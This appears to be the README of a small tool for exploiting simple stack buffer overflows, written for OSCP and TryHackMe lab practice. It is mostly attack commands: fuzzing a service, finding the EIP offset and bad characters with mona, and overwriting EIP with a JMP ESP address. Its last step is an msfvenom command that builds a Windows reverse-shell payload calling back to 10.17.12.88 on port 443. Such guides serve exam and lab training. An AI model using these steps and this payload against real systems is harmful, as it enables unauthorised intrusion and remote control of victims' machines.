qbof: Quickly crack simple stack based buffer overflows

Created while preparing for OSCP to crack BOF in under 20 minutes. These 2 python scripts is all we need.

Highly recommend the buffer overflow prep room on tryhackme to practice bof.

Need pwntools for pattern create functionality

pip install --user pwntools

Fuzzing

# Fuzz with a range to find crash point
python fuzzer.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --range "100-2100" --range-step 100

# Confirm crash by sending fix size payload
python fuzzer.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --size 2100

# Send a unique pattern instead of just AAAA
python fuzzer.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --size 2100 --pattern

# find offset by providing the EIP address value like this
python fuzzer.py --find-offset "61 75 74 61"

Test EIP

# Test we can controll EIP by sending BBBB by default into it
python eipcontroller.py  --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset {{1978}}

Find Bad Chars

!mona config -set workingfolder c:\mona

# generate hex array using mona to compare with the payload array
!mona bytearray -cpb "\x00"

# Send full_hex array to compare and look for bad chars
python eipcontroller.py  --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset 1978 --check-bad-chars

# compare from the start address of full_hex array in DUMP
!mona compare -f c:\mona\PROJECT\bytearray.bin -a {{ESP VALUE + NOP ADDR}}
# Example !mona compare -f C:\mona\oscp\bytearray.bin -a 0189FA30

# Example badchar compare output
# 00 07 08 2e 2f a0 a1
# Only the first ones are confimed bad chars.   00 07 2e a0
# try only excluding those then test if aything new pops in diff between payload and initially generated bytearray.bin

Find JMP ESP Instruction

# find jmp esp or equivlent in all modules excluding bad chars
# make sure memory address and payload doesn't have bad chars in it
!mona jmp -r esp -cpb "\x00\x{{BADCHARS}}"
# exmaple !mona jmp -r esp -cpb "\x00\x07\x2E\xA0"

Put and Test JMP ESP Address into EIP

# REVERSE THE ADDRESS TO MAKE IT LITTLE ENDIAN
# Example 0x625011af from mona output to "\xAF\x11\x50\x62"
# MANULLAY PUT IT IN eipcontroller.py
eip = "\xAF\x11\x50\x62"

# Create a break point on the found address in immunity
-> | black dotted line > Search address "625011af" > Select then F2 for breakpoint

# Test it's there
python eipcontroller.py  --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset 1978

MSFvenom Payload and GG

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.17.12.88 LPORT=443 EXITFUNC=thread -b '\x00\x07\x2E\xA0' -f c

# MANULLAY PUT IT IN eipcontroller.py
buf = "PAYLOAD"

python eipcontroller.py  --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset 1978 --nop 32